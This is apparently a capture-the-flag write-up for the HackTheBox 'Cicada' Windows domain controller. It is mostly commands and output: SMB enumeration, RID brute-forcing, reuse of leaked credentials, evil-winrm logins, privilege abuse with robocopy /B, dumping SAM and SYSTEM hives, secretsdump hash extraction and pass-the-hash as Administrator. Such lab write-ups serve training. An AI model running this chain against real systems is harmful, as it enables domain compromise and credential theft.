Dive into the depths of cybersecurity with the Cicada The Flag (CTF) challenge, a easy-level test of skill designed for seasoned professionals. This intense CTF writeup guides you through advanced techniques and complex vulnerabilities, pushing your expertise to the limit.
Add Hosts
Edit the /etc/hosts file and add the following entries:
Script to add hosts automatically
1
2
3
| ip="10.10.11.35"
domain="cicada.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
|
Mapping
nmap -sCV cicada.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-02 22:04 CEST
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.39% done; ETC: 22:05 (0:00:00 remaining)
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.051s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-03T03:05:32
|_ start_date: N/A
|_clock-skew: 7h00m00s
|
1. Enumerate SMB Shares Using smbclient
1
| smbclient -L //10.10.11.35
|
- Lists available SMB shares on the target machine.
2. Access the HR Share with SMBv2
1
| smbclient //10.10.11.35/HR -U '' -m SMB2
|
- Anonymous login to the
HR share, forcing SMBv2 protocol.
3. Read Notice from HR.txt for Credentials
1
| more "Notice from HR.txt"
|
- Use
more to read the Notice from HR.txt file, which contains credentials for user michael.wrightson.
4. Enumerate Users via RID Bruteforce Using netexec
1
| netexec smb --rid-brute -u guest -p '' -t 10 10.10.11.35
|
- Perform RID bruteforce on the SMB server using the
guest account. -t 10 increases thread count for faster scanning.
5. Further Enumeration Using enum4linux
1
| enum4linux-ng -u michael.wrightson -p '<password_from_notice_file>' -A 10.10.11.35 -d
|
- Run
enum4linux to gather detailed SMB information. One user found may be:1
2
3
4
5
| '1108':
username: david.orelious
name: (null)
acb: '0x00000210'
description: Just in case I forget my password is [REDACTED]
|
6. Access DEV Share Using smbclient
1
| smbclient -U david.orelious //10.10.11.35/DEV
|
- Navigate the
DEV share and find Backup_script.ps1.
- This reveals credentials for user
emily.oscars.
7. Log in to the System Using evil-winrm
1
| evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
|
- Use credentials from
Backup_script.ps1 to log in with evil-winrm.
8. Retrieve the user.txt Flag
1
| type ../Desktop/user.txt
|
- Read the
user.txt flag on the desktop of emily.oscars.
9. Privilege Escalation Using robocopy
1
| robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B
|
- Copy
root.txt from the Administrator’s desktop to the public directory using robocopy with the /B flag to bypass permissions.
10. Read the root.txt Flag
1
| type C:\Users\Public\root.txt
|
- Display the
root.txt flag.
Beyond Root with NT Admin Shell
- Log Back into the System Using
evil-winrm1
| evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
|
- Check Privileges in the Current Session
- Dump the SAM and SYSTEM Registry Files
1
2
3
| reg save hklm\sam sam
reg save hklm\system system
dir
|
- This saves the
sam and system registry files to the current directory.
- Download SAM and SYSTEM Files
1
2
| download sam
download system
|
- Extract NTLM Hashes Using Impacket’s
secretsdump1
| impacket-secretsdump -sam sam -system system LOCAL
|
- Extract the NTLM hash:
1
| Administrator:500:aad3b43....35b51404ee:[REDACTED_HASH]:::
|
- Log in as Administrator Using the NTLM Hash
1
| evil-winrm -u 'Administrator' -H '<Admin-Hash>' -i cicada.htb
|
- Use the Administrator NTLM hash to gain full access to the system.